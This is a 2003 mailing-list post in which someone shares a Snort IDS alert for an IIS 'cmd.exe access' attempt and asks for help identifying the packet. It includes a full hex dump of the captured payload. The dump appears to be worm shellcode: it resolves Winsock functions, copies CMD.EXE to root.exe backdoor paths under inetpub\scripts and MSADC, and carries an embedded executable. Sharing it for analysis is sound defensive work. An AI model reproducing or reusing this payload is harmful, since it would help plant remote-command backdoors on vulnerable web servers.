Hi I saw this packet #(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access IPv4: 194.204.X.X -> X.X.X.X hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116 chksum=60435 TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841 ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151 Payload: length = 1432 000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl 010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u. 020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close 030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E. 040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u. 050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri 060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E..... 070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U.. 080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem 090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E... 0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U 0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket. 0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl 0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U. 0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc 0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E.... 100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U. 110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select.. 120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen 130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E...... 140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E... 150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname.. 160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get 170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U 180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL 190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U.. 1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL 1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi 1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U 1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@. 1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........ 1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t..... 200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................ 210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................ 220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... .......... 230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................ 240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#.. 250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t... 260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h... 270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\. 280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE. 290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d: 2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts 2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$... 2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+... 2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm 2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD 2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$.. 300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U....... 310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP............. 320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@....... 330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L.... 340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%)............. 350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................ 360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@.. 370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................ 380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@....... 390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ... 3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0....... 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................ 3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`...... 400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@. 420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0 430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@......... 450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @. 490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @. 4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L... 4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1.... 4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h. 4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u& 4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @. 4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@ 500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?... 510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........ 520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L.... 530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @. 540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@.. 550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h 560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@....... 570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@ 580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h 590 : D4 24 40 00 6A 00 55 FF .$@.j.U. what is strange is that the cmd.exe / root.exe stuff is half way through with some other code before it the ip it hit was not mapped to anything ( I believe it is unused) so this can not have been part of another tcp converstion any ideas ? -- The should be a sig here, but it got bored and wandered off ---------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Fri May 30 2003 - 08:08:14 PDT